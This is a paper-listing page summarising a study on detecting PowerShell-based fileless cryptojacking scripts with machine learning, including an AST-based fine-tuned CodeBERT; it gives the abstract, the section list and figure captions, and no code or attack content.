Logo
ScienceStack
Table of Contents
Fetching ...
Sign In

Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning

Said Varlioglu, Nelly Elsayed, Murat Ozer, Zag ElSayed, John M. Emmert

TL;DR

Results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.

Abstract

With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective with stealthy techniques based on PowerShell-based exploitation in Windows OS environments. Even if attacks are detected and malicious scripts removed, processes may remain operational on victim endpoints, creating a significant challenge for detection mechanisms. In this paper, we conducted an experimental study with a collected dataset on detecting PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.

Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning

TL;DR

Results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.

Abstract

With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective with stealthy techniques based on PowerShell-based exploitation in Windows OS environments. Even if attacks are detected and malicious scripts removed, processes may remain operational on victim endpoints, creating a significant challenge for detection mechanisms. In this paper, we conducted an experimental study with a collected dataset on detecting PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming language.
Paper Structure (26 sections, 1 equation, 5 figures, 4 tables)

This paper contains 26 sections, 1 equation, 5 figures, 4 tables.

Table of Contents

  1. Introduction
  2. Method
  3. Background Literature
  4. Abstract Syntax Tree (AST)
  5. Abstract Syntax Tree (AST) Types
  6. Long Short-term Memory (LSTM)
  7. Bidirectional LSTM (BiLSTM)
  8. Transformers
  9. CodeBERT
  10. Related Works
  11. Preparation of Experimental Analysis
  12. Pipeline of ASTs
  13. Phases of Machine Learning Models
  14. Data Splitting and Validation Method
  15. Model Definition - LSTM and BiLSTM models
  16. ...and 11 more sections

Figures (5)

  • Figure 1: Sample encoded PowerShell-based fileless cryptojacking script.
  • Figure 2: Sample PowerShell-based fileless cryptojacking attacks workflow.
  • Figure 3: Sample AST of a Ping command: “ping -c 4 -t 64 uc.edu".
  • Figure 4: The LSTM architecture diagram elsayed2023litelstm.
  • Figure 5: BiLSTM model training and validation loss and accuracy results.